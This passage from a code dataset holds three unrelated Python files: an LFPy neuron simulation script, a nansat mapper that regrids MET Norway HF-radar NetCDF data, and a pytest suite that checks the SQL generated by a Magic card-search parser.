# 'lambda_f' : 1000, # segments are isopotential at this frequency
'custom_code' : [activewhere], # will run this file
}
#electrode coordinates
x=elcor[0,]
x= x.astype('Float64')
y=elcor[1,]
y= y.astype('Float64')
z=elcor[2,]
z= z.astype('Float64')
# y = pl.zeros(X.size)
#define parameters for extracellular recording electrode, using optional method
electrodeParameters = {
'sigma' : sigma, # extracellular conductivity
'x' : x, # x,y,z-coordinates of contact points
'y' : y,
'z' : z,
# 'method' : 'som_as_point', #treat soma segment as sphere source
# 'method' : 'pointsource'
'method' : 'linesource'
}
#pointprocess= {
# 'idx' : 1,
# 'record_current' : True,
# 'pptype' : 'IClamp',
# 'amp' : 0.05,
# #'amp' : 0.2,
# 'dur' : 30,
# 'delay' : 15
# }
##create extracellular electrode object
electrode = LFPy.RecExtElectrode(**electrodeParameters)
simulationParameters = {
'electrode' : electrode,
'rec_imem' : True, # Record Membrane currents during simulation
'rec_isyn' : True, # Record synaptic currents
}
#Initialize cell instance, using the LFPy.Cell class
cell = LFPy.Cell(**cell_parameters)
#rotating the cell
#rotation = {'x' : np.pi/2, 'y' : 0, 'z' : 0}
#cell.set_rotation(**rotation)
#set the position of midpoint in soma to Origo (not needed, this is the default)
#Why I am doing this? #That might modifies the plots and the setups!!!!!!!!!!!!!!44
cell.set_pos(xpos = LFPy.cell.neuron.h.x3d(0) , ypos = LFPy.cell.neuron.h.y3d(0) , zpos = LFPy.cell.neuron.h.z3d(0))
#cell.set_pos(xpos = xpontok[1], ypos = ypontok[1], zpos = zpontok[1])
#Synaptic inputs
# Define synapse parameters
synapse_parameters = {
'idx' : cell.get_closest_idx(x=100., y=0., z=500.), #100 0.00 500
'e' : 0., # reversal potential
'syntype' : 'ExpSyn', # synapse type
#'tau' : 10., # syn. time constant
'tau' : 2.,
# 'weight' : .001, # syn. weight
'weight' : .04, # syn. weight
'record_current' : True,
}
synapse_parameters2 = {
'idx' : cell.get_closest_idx(x=-100., y=0., z=400.), #100 0.00 500
'e' : 0., # reversal potential
'syntype' : 'ExpSyn', # synapse type
#'tau' : 10., # syn. time constant
'tau' : 2.,
# 'weight' : .001, # syn. weight
'weight' : .03, # syn. weight
'record_current' : True,
}
synapse_parameters3 = {
'idx' : cell.get_closest_idx(x=40., y=0., z=200.), #100 0.00 500
'e' : 0., # reversal potential
'syntype' : 'ExpSyn', # synapse type
#'tau' : 10., # syn. time constant
'tau' : 2.,
# 'weight' : .001, # syn. weight
'weight' : .04, # syn. weight
'record_current' : True,
}
############################################x
# Define synapse parameters
synapse_parameters_random = {
'idx' : 0, # to be set later
'e' : 0., # reversal potential
'syntype' : 'ExpSyn', # synapse type
'tau' : 2., # syn. time constant
'weight' : .01, # syn. weight
'record_current' : True,
}
#synaptic spike times
n_pre_syn = 1000
pre_syn_sptimes = stationary_poisson(nsyn=n_pre_syn, lambd=2, tstart=0, tstop=400)#70)
#assign spike times to different units
n_synapses = 1000
# Create synapse and set time of synaptic input
pre_syn_pick = np.random.permutation(np.arange(n_pre_syn))[0:n_synapses]
for i_syn in xrange(n_synapses):
syn_idx = int(cell.get_rand_idx_area_norm())
synapse_parameters_random.update({'idx' : syn_idx})
synapse = LFPy.Synapse(cell, **synapse_parameters_random)
synapse.set_spike_times(pre_syn_sptimes[pre_syn_pick[i_syn]])
##############################################################
# Create synapse and set time of synaptic input
#synapse = LFPy.Synapse(cell, **synapse_parameters)
#synapse2 = LFPy.Synapse(cell, **synapse_parameters2)
#synapse3 = LFPy.Synapse(cell, **synapse_parameters3)
#insert_synapses(synapse_parameters_2, **insert_synapses_2)
#synapse.set_spike_times(np.array([5.,25., 44.]))
#synapse2.set_spike_times(np.array([15.,20., 40.]))
#synapse3.set_spike_times(np.array([10.,33.]))
TimesStim= np.arange(850)
for istim in xrange(850):
pointprocess= {
'idx' : 0,
# 'record_current' : True,
'pptype' : 'IClamp',
'amp' : np.array(3.6*np.sin(2.*3.141*6.5*TimesStim/1000.))[istim], #3.6
# #'amp' : 0.2,
'dur' : 1.,
'delay' : istim,
}
stimulus = LFPy.StimIntElectrode(cell, **pointprocess)
#stimulus = LFPy.StimIntElectrode(cell, **pointprocess)
#perform NEURON simulation, results saved as attributes in the cell instance
cell.simulate(**simulationParameters)
#np.savetxt( 'Istim',stimulus.i)
np.savetxt( 'membcurr',cell.imem)
np.savetxt( 'myLFP', electrode.LFP)
np.savetxt( 'somav.txt', cell.somav)
coords = np.hstack(
(cell.xmid, cell.ymid, cell.zmid)
)
np.savetxt( 'coordsmid_x_y_z',coords)
#coordinates of the segment's beginning
coordsstart = np.hstack(
(cell.xstart, cell.ystart, cell.zstart)
)
np.savetxt( 'coordsstart_x_y_z',coordsstart)
#coordinates of the segment's end
coordsend = np.hstack(
(cell.xend, cell.yend, cell.zend)
)
np.savetxt( 'coordsend_x_y_z',coordsend)
#sdiameter of the segments
segdiam = np.hstack(
(cell.diam)
)
np.savetxt( 'segdiam_x_y_z',segdiam)
##########x
#elec = np.hstack(
# (electrode.x, electrode.y, electrode.z)
#)
#np.savetxt(outname,' + 'elcoord_x_y_z',elec)
#length of segments
np.savetxt( 'seglength',cell.length)
#time in the simulation
np.savetxt( 'time',cell.tvec)
#lets write to file the simulation locations
np.savetxt( 'synapse_locations',pre_syn_pick)
#elprop=np.hstack((d,electrode.sigma))
#np.savetxt( 'elprop',electrode.sigma)
# Plotting of simulation results:
################################x
#LFPy.cell.neuron.h...
#h = LFPy.cell.neuron.h
#hossz=len(cell.allsecnames)
#f4 = open(outname,' + '/segcoords/branchnum', 'w')
#f4.write(str(hossz))
#f4.close()
#b=0
#for x in cell.allseclist:
# b=b+1
# xc=list()
# yc=list()
# zc=list()
# for i in range(int(h.n3d())):
# #print h.x3d(i)
# xc.append(h.x3d(i))
# yc.append(h.y3d(i))
# zc.append(h.z3d(i))
# np.savetxt(outname,' + '/segcoords/segcord'+str(b),np.hstack((xc,yc,zc)))
| csdori/skCSD | simulation/LFP_calc_sine.py | Python | bsd-3-clause | 8,494 | [
"NEURON"
] | 783422a9033b7d86f08649752917bc22e34b396826c7461561c9493fe3fbd626 |
# Name: mapper_metno_hfr
# Purpose: Mapper for CODAR SeaSonde High-Frequency radar data provided by MET Norway
# For data see: https://thredds.met.no/thredds/catalog/remotesensinghfradar/catalog.html
# Authors: Artem Moiseev
# Licence: This file is part of NANSAT. You can redistribute it or modify
# under the terms of GNU General Public License, v.3
# http://www.gnu.org/licenses/gpl-3.0.html
import os
from datetime import datetime, timedelta
import json
from netCDF4 import Dataset, num2date
import numpy as np
from osgeo import gdal, osr
import pythesint as pti
from scipy.interpolate import griddata
from nansat.vrt import VRT
from nansat.exceptions import WrongMapperError
class Mapper(VRT):
BAND_NAMES = ['direction', 'ersc', 'ertc', 'espc', 'etmp', 'maxv',
'minv', 'sprc', 'u', 'v', 'velo', 'vflg', 'xdst', 'ydst']
SUPPORTED_LOCATIONS = ['RDLm_TORU', 'RDLm_FRUH', 'RDLm_BERL']
def __init__(self, filename, gdal_dataset, gdal_metadata, GCP_COUNT=10, timestamp=None, **kwargs):
filename_name = os.path.split(filename)[-1].split('.')[0]
# Check if correct mapper
correct_mapper = False
for location in self.SUPPORTED_LOCATIONS:
# If it matches with one of locateions break the loop and flag True
if filename_name.startswith(location):
correct_mapper = True
break
if not correct_mapper:
raise WrongMapperError
# Import NetCDF4 dataset
nc_dataset = Dataset(filename)
# Define projection (depending on the HFR)
if nc_dataset.getncattr('site') == 'TORU':
proj4 = '+proj=utm +zone=32 +ellps=WGS84 +datum=WGS84 +units=m +no_defs'
GRID_PX_SIZE = 1500 # Final raster px size in meters
elif nc_dataset.getncattr('site') == 'FRUH':
proj4 = '+proj=utm +zone=34 +ellps=WGS84 +datum=WGS84 +units=m +no_defs'
GRID_PX_SIZE = 5000 # Final raster px size in meters
elif nc_dataset.getncattr('site') == 'BERL':
proj4 = '+proj=utm +zone=35 +ellps=WGS84 +datum=WGS84 +units=m +no_defs'
GRID_PX_SIZE = 5000 # Final raster px size in meters
else:
raise WrongMapperError
srs = osr.SpatialReference()
srs.ImportFromProj4(proj4)
projection = srs.ExportToWkt()
# Get x grid and y grid
x_grd, y_grd = self.create_linear_grid(nc_dataset['x'][:], nc_dataset['y'][:], GRID_PX_SIZE)
raster_x_size, raster_y_size = x_grd.shape
# Define geotransform
geotransform = (x_grd.min(), GRID_PX_SIZE, 0.0, y_grd.max(), 0.0, GRID_PX_SIZE * -1)
# Define x and y size
self._init_from_dataset_params(raster_x_size, raster_y_size, geotransform, projection)
# If required timestamp was not specified then extract date from filename and use first time
if timestamp is None:
timestamp = self.date_from_filename(filename)
# Comvert time info from the dataset to the datetime
timestamps = num2date(nc_dataset['time'][:].data, nc_dataset['time'].units)
# find band id for the required timestamp
# Note add 1 because in gdal counting starts from 1 not from 0
src_timestamp_id = np.where(timestamps == timestamp)[0][0] + 1
# Iterate through all subdatasets and bands to the dataset
for subdataset in gdal_dataset.GetSubDatasets():
# Get name of subdataset
subdataset_name = subdataset[0].split(':')[2]
# Check if the subdataset in the accepted 3D vars list
if subdataset_name not in self.BAND_NAMES:
continue
gdal_subdataset = gdal.Open(subdataset[0])
# need to be float for the nan replasement
band_data = gdal_subdataset.GetRasterBand(int(src_timestamp_id)).ReadAsArray().astype('float')
# remove fill value (replace with nan)
fill_value = int(gdal_subdataset.GetMetadata_Dict()['#'.join([subdataset_name, '_FillValue'])])
band_data[band_data == fill_value] = np.nan
# Interpolate data on the regular grid
band_grid_data = self.band2grid((nc_dataset['x'][:], nc_dataset['y'][:]),
band_data, (x_grd, y_grd))
# Create VRT ffor the regridded data
band_vrt = VRT.from_array(band_grid_data)
# Add VRT to the list of all dataset vrts
self.band_vrts[subdataset_name + 'VRT'] = band_vrt
# Add band to the dataset
src = {'SourceFilename': self.band_vrts[subdataset_name + 'VRT'].filename,
'SourceBand': 1}
# Add band specific metadata
dst = {'name': subdataset_name}
for key in gdal_subdataset.GetMetadata_Dict().keys():
if key.startswith(subdataset_name):
clean_metadata_name = key.split('#')[1]
dst[clean_metadata_name] = gdal_subdataset.GetMetadata_Dict()[key]
# Create band
self.create_band(src, dst)
self.dataset.FlushCache()
# Set GCMD metadata
self.dataset.SetMetadataItem('instrument', json.dumps(pti.get_gcmd_instrument('SCR-HF')))
self.dataset.SetMetadataItem('platform', json.dumps(pti.get_gcmd_platform('CODAR SeaSonde')))
self.dataset.SetMetadataItem('Data Center', json.dumps(pti.get_gcmd_provider('NO/MET')))
self.dataset.SetMetadataItem('Entry Title', 'Near-Real Time Surface Ocean Radial Velocity')
self.dataset.SetMetadataItem('gcmd_location',json.dumps(pti.get_gcmd_location('NORTH SEA')))
# Set time coverage metadata
self.dataset.SetMetadataItem('time_coverage_start', timestamp.isoformat())
self.dataset.SetMetadataItem('time_coverage_end',
(timestamp + timedelta(minutes=59, seconds=59)).isoformat())
# Set NetCDF dataset metadata
for key, value in gdal_dataset.GetMetadata_Dict().items():
self.dataset.SetMetadataItem(key.split('#')[1], value)
def date_from_filename(self, src):
filename = os.path.splitext(os.path.basename(src))[0]
year, month, day = filename.split('_')[-3:]
src_timestamp = datetime(int(year), int(month), int(day), 0, 0, 0)
return src_timestamp
def create_linear_grid(self, x, y, px_size):
x_grd, y_grd = np.meshgrid(np.arange(x.min(), x.max(), px_size),
np.arange(y.max(), y.min(), px_size * -1))
return x_grd, y_grd
def band2grid(self, src_grd, var, dst_grd):
# Points [(x, y), ... , ] from original file
points = list(zip(src_grd[0].flatten(), src_grd[1].flatten()))
repr_var = griddata(points, var.flatten(), (dst_grd[0], dst_grd[1]), method='nearest')
return repr_var
| nansencenter/nansat | nansat/mappers/mapper_metno_hfr.py | Python | gpl-3.0 | 6,968 | [
"NetCDF"
] | a08bf80b8aab9b70eecbc05e74b89b9f962ca468ea00934329b80993e647baba |
from typing import List
import pytest
from find import search
from find.search import InvalidValueException
from magic import seasons
from magic.database import db
# Some of these tests only work hooked up to a cards db, and are thus marked functional. They are fast, though, and you should run them if editing card search.
# $ python3 dev.py test find
def test_match() -> None:
assert search.Key.match('c')
assert search.Key.match('mana')
assert not search.Key.match('z')
assert not search.Key.match('')
assert not search.Key.match(' ')
assert not search.Criterion.match('magic:2uu')
assert search.Criterion.match('tou>2')
# START Tests from https://scryfall.com/docs/syntax
@pytest.mark.functional
def test_colors_and_color_identity() -> None:
s = 'c:rg'
do_functional_test(s, ['Animar, Soul of Elements', 'Boggart Ram-Gang', 'Progenitus'], ['About Face', 'Cinder Glade', 'Lupine Prototype', 'Sylvan Library'])
s = 'color>=uw -c:red'
do_functional_test(s, ['Absorb', 'Arcades Sabboth', 'Bant Sureblade', 'Worldpurge'], ['Brainstorm', 'Mantis Rider', 'Karn Liberated'])
s = 'id<=esper t:instant'
do_functional_test(s, ['Abeyance', 'Abjure', 'Absorb', 'Ad Nauseam', 'Batwing Brume', 'Warping Wail'], ['Act of Aggression', 'Inside Out', 'Jilt'])
s = 'id<=ESPER t:instant'
do_functional_test(s, ['Abeyance', 'Abjure', 'Absorb', 'Ad Nauseam', 'Batwing Brume', 'Warping Wail'], ['Act of Aggression', 'Inside Out', 'Jilt'])
s = 'c:m'
do_functional_test(s, ['Bant Charm', 'Murderous Redcap'], ['Izzet Signet', 'Lightning Bolt', 'Spectral Procession'])
s = 'c=br'
do_functional_test(s, ['Murderous Redcap', 'Terminate'], ['Cruel Ultimatum', 'Fires of Undeath', 'Hymn to Tourach', 'Lightning Bolt', 'Rakdos Signet'])
s = 'id:c t:land'
do_functional_test(s, ['Ancient Tomb', 'Wastes'], ['Academy Ruins', 'Island', 'Nihil Spellbomb'])
s = 'c:colorless'
do_functional_test(s, ['Plains', "Tormod's Crypt"], ['Master of Etherium'])
# "the four-color nicknames chaos, aggression, altruism, growth, artifice are supported"
@pytest.mark.functional
def test_types() -> None:
s = 't:merfolk t:legend'
do_functional_test(s, ['Emry, Lurker of the Loch', 'Sygg, River Cutthroat'], ['Hullbreacher', 'Ragavan, Nimble Pilferer'])
s = 't:goblin -t:creature'
do_functional_test(s, ['Tarfire', 'Warren Weirding'], ['Goblin Bombardment', 'Lightning Bolt', 'Skirk Prospector'])
@pytest.mark.functional
def test_card_text() -> None:
s = 'o:draw o:creature'
do_functional_test(s, ['Edric, Spymaster of Trest', 'Grim Backwoods', 'Mystic Remora'], ['Ancestral Recall', 'Honor of the Pure'])
s = 'o:"~ enters the battlefield tapped"'
do_functional_test(s, ['Arcane Sanctum', 'Diregraf Ghoul', 'Golgari Guildgate'], ['Tarmogoyf'])
@pytest.mark.functional
def test_mana_costs() -> None:
s = 'mana:{G}{U}'
do_functional_test(s, ['Omnath, Locus of Creation', 'Ice-Fang Coatl'], ['Breeding Pool', 'Slippery Bogle'])
# https://github.com/PennyDreadfulMTG/Penny-Dreadful-Tools/issues/8969
# s = 'm:2WW'
# do_functional_test(s, ["Emeria's Call", 'Solitude'], ['Karoo', 'Spectral Procession'])
# s = 'm>3WU'
# do_functional_test(s, ['Drogskol Reaver', 'Sphinx of the Steel Wind'], ['Angel of the Dire Hour', 'Fractured Identity'])
s = 'm:{R/P}'
do_functional_test(s, ['Gut Shot', 'Slash Panther'], ['Dismember', 'Lightning Bolt'])
s = 'c:u cmc=5'
do_functional_test(s, ['Force of Will', 'Fractured Identity'], ['Goldspan Dragon', 'Omnath, Locus of Creation'])
# https://github.com/PennyDreadfulMTG/Penny-Dreadful-Tools/issues/8968
# s = 'devotion:{u/b}{u/b}{u/b}'
# do_functional_test(s, ['Ashemnoor Gouger', 'Niv-Mizzet Parun', 'Omniscience', 'Phrexian Obliterator', 'Progenitus'], ['Cunning Nightbonger', 'Watery Grave'])
# https://github.com/PennyDreadfulMTG/Penny-Dreadful-Tools/issues/8618
# s = 'produces=wu'
# do_functional_test(s, ['Azorius Signet', 'Celestial Colonnade'], ['Birds of Paradise', 'Teferi, Time Raveler'])
@pytest.mark.functional
def test_power_toughness_and_loyalty() -> None:
s = 'pow>=8'
do_functional_test(s, ["Death's Shadow", 'Dragonlord Atarka', 'Emrakul, the Aeons Torn'], ['Mortivore', 'Swamp', 'Tarmogoyf', 'Wild Nacatl'])
# https://github.com/PennyDreadfulMTG/Penny-Dreadful-Tools/issues/8970
# s = 'pow>tou c:w t:creature'
# do_functional_test(s, ["Kataki, War's Wage", 'Knight of Autumn'], ['Bonecrusher Giant', 'Hullbreacher', 'Swamp'])
s = 't:planeswalker loy=3'
do_functional_test(s, ['Jace, the Mind Sculptor', 'Liliana of the Veil'], ['Karn, the Great Creator', 'Mountain', 'Progenitus'])
@pytest.mark.functional
def test_multi_faced_cards() -> None:
s = 'is:meld'
do_functional_test(s, ['Hanweir Battlements', 'Hanweir Garrison'], ['Hanweir, the Writhing Township'])
s = 'is:split'
do_functional_test(s, ['Driven // Despair', 'Fire // Ice', 'Wear // Tear'], ['Budoka Gardener', 'Hanweir Garrison'])
@pytest.mark.functional
def test_spells_permanents_and_effects() -> None:
s = 'c>=br is:spell f:duel'
do_functional_test(s, ["Kolaghan's Command", 'Sliver Queen'], ['Cat Dragon', 'Badlands'])
s = 'is:permanent t:rebel'
do_functional_test(s, ['Aven Riftwatcher', 'Bound in Silence'], ['Brutal Suppression', 'Mirror Entity'])
s = 'is:vanilla'
do_functional_test(s, ['Grizzly Bears', 'Isamaru, Hound of Konda'], ['Giant Spider', 'Lightning Bolt', 'Tarmogoyf'])
# … Extra Cards and Funny Cards …
@pytest.mark.functional
def test_rarity() -> None:
s = 'r:common t:artifact'
do_functional_test(s, ['Court Homunculus', 'Prophetic Prism', "Tormod's Crypt"], ['Lightning Bolt', 'Master of Etherium'])
s = 'r>=r'
do_functional_test(s, ['Black Lotus', "Elspeth, Sun's Champion", 'Lotus Cobra'], ['Abbey Griffin', 'Tattermunge Maniac'])
# We don't currently support `new:rarity`
# s = 'rarity:common e:ima new:rarity'
# do_functional_test(s, ['Darksteel Axe', 'Seeker of the Way'], ['Balustrade Spy', 'Bladewing the Risen'])
@pytest.mark.functional
def test_sets_and_blocks() -> None:
s = 'e:war'
do_functional_test(s, ['Blast Zone', 'Finale of Devastation', 'Tezzeret, Master of the Bridge'], ['Lightning Helix', 'Wastes'])
# s = 'e:war is:booster'
# do_functional_test(s, ['Blast Zone', 'Finale of Devastation'], ['Lightning Helix', 'Tezzeret, Master of the Bridge', 'Wastes'])
# s = 'b:wwk'
# do_functional_test(s, ['Inquisition of Kozilek', 'Jace, the Mind Sculptor', 'Misty Rainforest', 'Stoneforge Mystic'], [])
# s = 'in:lea in:m15'
# do_functional_test(s, ['Plains', 'Shivan Dragon'], ['Ancestral Recall', 'Chord of Calling', 'Lightning Bolt'])
# s = 't:legendary -in:booster'
# do_functional_test(s, ['Animatou, the Fateshifter', 'Korvold, Fae-Cursed King'], ['Retrofitter Foundry', 'Swamp', 'Wrenn and Six'])
# s = 'is:datestamped is:prerelease'
# do_functional_test(s, ['Mox Amber', 'Ulamog, the Ceaseless Hunger'], ['Mayor of Avabruck', 'Valakut, the Molten Pinnacle'])
# … Cubes …
@pytest.mark.functional
def test_format_legality() -> None:
s = 'c:g t:creature f:pauper'
do_functional_test(s, ['Nettle Sentinel', 'Rhox Brute', 'Slippery Bogle'], ['Ninja of the Deep Hours', 'Noble Hierarch', 'Utopia Sprawl'])
# s = 'banned:legacy'
# do_functional_test(s, ['Flash', 'Frantic Search', 'Mox Jet', 'Necropotence'], ['Delver of Secrets', 'Force of Will'])
s = 'is:commander'
do_functional_test(s, ['Progenitus', 'Teferi, Temporal Archmage'], ['Forest', 'Nettle Sentinel', 'Rofellos, Llanowar Emissary'])
# s = 'is:reserved'
# do_functional_test(s, [], [])
# USD/EUR/TIX prices
# Artist, Flavor Text and Watermark
# Border, Frame, Foil and Resolution
# Games, Promos and Spotlights
# Year
# Tagger tags
# Reprints
# Languages
# Shortcuts and Nicknames
@pytest.mark.functional
def test_negating_conditions() -> None:
s = '-fire c:r t:instant'
do_functional_test(s, [], [])
s = 'o:changeling -t:creature'
do_functional_test(s, [], [])
s = 'not:reprint e:c16'
do_functional_test(s, [], [])
# Regular Expressions
# Exact Names
@pytest.mark.functional
def test_using_or() -> None:
s = 't:fish or t:bird'
do_functional_test(s, [], [])
s = 't:land (a:titus or a:avon)'
do_functional_test(s, [], [])
@pytest.mark.functional
def test_nesting_conditions() -> None:
s = 't:legenday (t:goblin or t:elf)'
do_functional_test(s, [], [])
s = 'through (depths or sands or mists)'
do_functional_test(s, ['Peer Through Depths', 'Reach Through Mists', 'Sift Through Sands'], ['Dig Through Time', 'Through the Breach'])
# Display Keywords
# END Tests from https://scryfall.com/docs/syntax
@pytest.mark.functional
def test_edition_functional() -> None:
do_functional_test('e:ktk', ['Flooded Strand', 'Treasure Cruise', 'Zurgo Helmsmasher'], ['Life from the Loam', 'Scalding Tarn', 'Zurgo Bellstriker'])
def test_edition() -> None:
do_test('e:ktk', "(c.id IN (SELECT card_id FROM printing WHERE set_id IN (SELECT id FROM `set` WHERE name = 'ktk' OR code = 'ktk')))")
def test_special_chars() -> None:
do_test('o:a_c%', "(oracle_text LIKE '%%a\\_c\\%%%%')")
@pytest.mark.functional
def test_tilde_functional() -> None:
do_functional_test('o:"sacrifice ~"', ['Abandoned Outpost', 'Black Lotus'], ['Cartel Aristocrat', 'Life from the Loam'])
def test_tilde() -> None:
expected = "(oracle_text LIKE CONCAT('%%sacrifice ', name, '%%'))"
do_test('o:"sacrifice ~"', expected)
@pytest.mark.functional
def test_double_tilde_functional() -> None:
do_functional_test('o:"sacrifice ~: ~ deals 2 damage to any target"', ['Blazing Torch', 'Inferno Fist'], ['Black Lotus', 'Cartel Aristocrat'])
def test_double_tilde() -> None:
expected = "(oracle_text LIKE CONCAT('%%sacrifice ', name, ': ', name, ' deals 2 damage to any target%%'))"
do_test('o:"sacrifice ~: ~ deals 2 damage to any target"', expected)
@pytest.mark.functional
def test_color() -> None:
do_functional_test('c<=w t:creature', ['Icehide Golem', 'Thalia, Guardian of Thraben'], ['Delver of Secrets', 'Duskwatch Recruiter', 'Enlightened Tutor', 'Mantis Rider'])
@pytest.mark.functional
def test_only_multicolored_functional() -> None:
do_functional_test('c:m', ['Bant Charm', 'Murderous Redcap'], ['Door to Nothingness', 'Fires of Undeath', 'Lightning Bolt'])
def test_only_multicolored() -> None:
do_test('c:m', '(c.id IN (SELECT card_id FROM card_color GROUP BY card_id HAVING COUNT(card_id) >= 2))')
def test_multicolored_with_other_colors() -> None:
found = False
try:
do_test('c:bm', '')
except InvalidValueException:
found = True
assert found
@pytest.mark.functional
def test_multicolored_coloridentity_functional() -> None:
do_functional_test('ci>=b', ['Dark Ritual', 'Golos, Tireless Pilgrim', 'Murderous Redcap', 'Swamp'], ['Black Lotus', 'Daze', 'Plains'])
def test_multicolored_coloridentity() -> None:
do_test('ci>=b', '((c.id IN (SELECT card_id FROM card_color_identity WHERE color_id = 3)))')
@pytest.mark.functional
def test_exclusivemulitcolored_same_functional() -> None:
do_functional_test('ci!b', ['Dark Ritual', 'Swamp'], ['Black Lotus', 'Golos, Tireless Pilgrim', 'Muderous Redcap'])
def test_exclusivemulitcolored_same() -> None:
do_test('ci!b', '((c.id IN (SELECT card_id FROM card_color_identity WHERE color_id = 3))) AND (c.id IN (SELECT card_id FROM card_color_identity GROUP BY card_id HAVING COUNT(card_id) <= 1))')
def test_mulitcolored_multiple() -> None:
do_test('c=br', '((c.id IN (SELECT card_id FROM card_color WHERE color_id = 3))) AND ((c.id IN (SELECT card_id FROM card_color WHERE color_id = 4))) AND (c.id IN (SELECT card_id FROM card_color GROUP BY card_id HAVING COUNT(card_id) <= 2))')
@pytest.mark.functional
def test_multicolored_exclusive_functional() -> None:
do_functional_test('c!br', ["Kroxa, Titan of Death's Hunger", 'Fulminator Mage', 'Murderous Redcap'], ['Bosh, Iron Golem', 'Dark Ritual', 'Fires of Undeath'])
def test_multicolored_exclusive() -> None:
do_test('c!br', '((c.id IN (SELECT card_id FROM card_color WHERE color_id = 3))) AND ((c.id IN (SELECT card_id FROM card_color WHERE color_id = 4))) AND (c.id IN (SELECT card_id FROM card_color GROUP BY card_id HAVING COUNT(card_id) <= 2))')
@pytest.mark.functional
def test_color_identity_functional() -> None:
yes = ['Brainstorm', 'Force of Will', 'Mystic Sanctuary', 'Venser, Shaper Savant']
no = ['Electrolyze', 'Swamp', 'Underground Sea']
do_functional_test('ci=u', yes, no)
do_functional_test('cid=u', yes, no)
do_functional_test('id=u', yes, no)
def test_color_identity() -> None:
where = '((c.id IN (SELECT card_id FROM card_color_identity WHERE color_id = 2))) AND (c.id IN (SELECT card_id FROM card_color_identity GROUP BY card_id HAVING COUNT(card_id) <= 1))'
do_test('ci=u', where)
do_test('cid=u', where)
do_test('id=u', where)
do_test('commander=u', where)
@pytest.mark.functional
def test_color_identity_two_colors() -> None:
do_functional_test('id:uw', ['Brainstorm', 'Dream Trawler', 'Island', 'Wastes'], ['Forbidden Alchemy', 'Lightning Bolt', 'Watery Grave'])
@pytest.mark.functional
def test_color_identity_colorless_functional() -> None:
do_functional_test('ci:c', ['Lodestone Golem', 'Wastes'], ['Academy Ruins', 'Bosh, Iron Golem', 'Lightning Bolt', 'Plains'])
def test_color_identity_colorless() -> None:
do_test('ci:c', '(NOT (c.id IN (SELECT card_id FROM card_color_identity WHERE color_id = 3))) AND (NOT (c.id IN (SELECT card_id FROM card_color_identity WHERE color_id = 5))) AND (NOT (c.id IN (SELECT card_id FROM card_color_identity WHERE color_id = 4))) AND (NOT (c.id IN (SELECT card_id FROM card_color_identity WHERE color_id = 2))) AND (NOT (c.id IN (SELECT card_id FROM card_color_identity WHERE color_id = 1))) AND (c.id NOT IN (SELECT card_id FROM card_color_identity))')
@pytest.mark.functional
def test_color_exclusively_functional() -> None:
do_functional_test('c!r', ['Gut Shot', 'Lightning Bolt'], ['Bosh, Iron Golem', 'Lightning Helix', 'Mountain', 'Mox Ruby'])
def test_color_exclusively() -> None:
do_test('c!r', '((c.id IN (SELECT card_id FROM card_color WHERE color_id = 4))) AND (c.id IN (SELECT card_id FROM card_color GROUP BY card_id HAVING COUNT(card_id) <= 1))')
@pytest.mark.functional
def test_color_exclusively2_functional() -> None:
do_functional_test('c!rg', ['Assault // Battery', 'Destructive Revelry', 'Tattermunge Maniac'], ['Ancient Grudge', 'Lightning Bolt', 'Taiga'])
def test_color_exclusively2() -> None:
do_test('c!rg', '((c.id IN (SELECT card_id FROM card_color WHERE color_id = 5))) AND ((c.id IN (SELECT card_id FROM card_color WHERE color_id = 4))) AND (c.id IN (SELECT card_id FROM card_color GROUP BY card_id HAVING COUNT(card_id) <= 2))')
def test_colorless_with_color() -> None:
found = False
try:
do_test('c:cr', '')
except InvalidValueException:
found = True
assert found
def test_colorless_exclusivity() -> None:
do_test('c!c', '(c.id NOT IN (SELECT card_id FROM card_color))')
def test_colorless_exclusivity2() -> None:
found = False
try:
do_test('c!cr', '')
except InvalidValueException:
found = True
assert found
@pytest.mark.functional
def test_multiple_colors_functional() -> None:
do_functional_test('c:rgw', ['Naya Charm', 'Progenitus', 'Reaper King', 'Transguild Courier'], ["Atarka's Command", 'Jegantha, the Wellspring'])
def test_multiple_colors() -> None:
do_test('c:rgw', '((c.id IN (SELECT card_id FROM card_color WHERE color_id = 5))) AND ((c.id IN (SELECT card_id FROM card_color WHERE color_id = 4))) AND ((c.id IN (SELECT card_id FROM card_color WHERE color_id = 1)))')
def test_mana() -> None:
do_test('mana=2WW', "(mana_cost = '{2}{W}{W}')")
def test_mana2() -> None:
do_test('mana=X2/W2/WRB', "(mana_cost = '{X}{2/W}{2/W}{R}{B}')")
def test_mana3() -> None:
do_test('mana=XRB', "(mana_cost = '{X}{R}{B}')")
def test_mana4() -> None:
do_test('mana=15', "(mana_cost = '{15}')")
def test_mana5() -> None:
do_test('mana=U/P', "(mana_cost = '{U/P}')")
def test_mana6() -> None:
do_test('mana:c', "(mana_cost LIKE '%%{C}%%')")
def test_mana7() -> None:
do_test('mana:uu', "(mana_cost LIKE '%%{U}{U}%%')")
def test_mana8() -> None:
do_test('mana:g/u/p', "(mana_cost LIKE '%%{G/U/P}%%')")
@pytest.mark.functional
def test_hybrid_phyrexian_mana() -> None:
do_functional_test('mana:g/u/p', ['Tamiyo, Compleated Sage'], ['Corrosive Gale', 'Gitaxian Probe'])
# https://github.com/PennyDreadfulMTG/Penny-Dreadful-Tools/issues/8975
# def test_mana8() -> None:
# assert search.parse(search.tokenize('mana=2ww')) == search.parse(search.tokenize('mana=ww2'))
def test_uppercase() -> None:
pd_id = db().value('SELECT id FROM format WHERE name LIKE %s', ['{term}%%'.format(term=seasons.current_season_name())])
do_test('F:pd', "(c.id IN (SELECT card_id FROM card_legality WHERE format_id = {pd_id} AND legality <> 'Banned'))".format(pd_id=pd_id))
def test_subtype() -> None:
do_test('subtype:warrior', "(c.id IN (SELECT card_id FROM card_subtype WHERE subtype LIKE '%%warrior%%'))")
def test_not() -> None:
do_test('t:creature -t:artifact t:legendary', "(type_line LIKE '%%creature%%') AND NOT (type_line LIKE '%%artifact%%') AND (type_line LIKE '%%legendary%%')")
def test_not_cmc() -> None:
do_test('-cmc=2', 'NOT (cmc IS NOT NULL AND cmc = 2)')
def test_cmc() -> None:
do_test('cmc>2', '(cmc IS NOT NULL AND cmc > 2)')
do_test('cmc=0', '(cmc IS NOT NULL AND cmc = 0)')
def test_not_text() -> None:
do_test('o:haste -o:deathtouch o:trample NOT o:"first strike" o:lifelink', "(oracle_text LIKE '%%haste%%') AND NOT (oracle_text LIKE '%%deathtouch%%') AND (oracle_text LIKE '%%trample%%') AND NOT (oracle_text LIKE '%%first strike%%') AND (oracle_text LIKE '%%lifelink%%')")
@pytest.mark.functional
def test_color_not_text_functional() -> None:
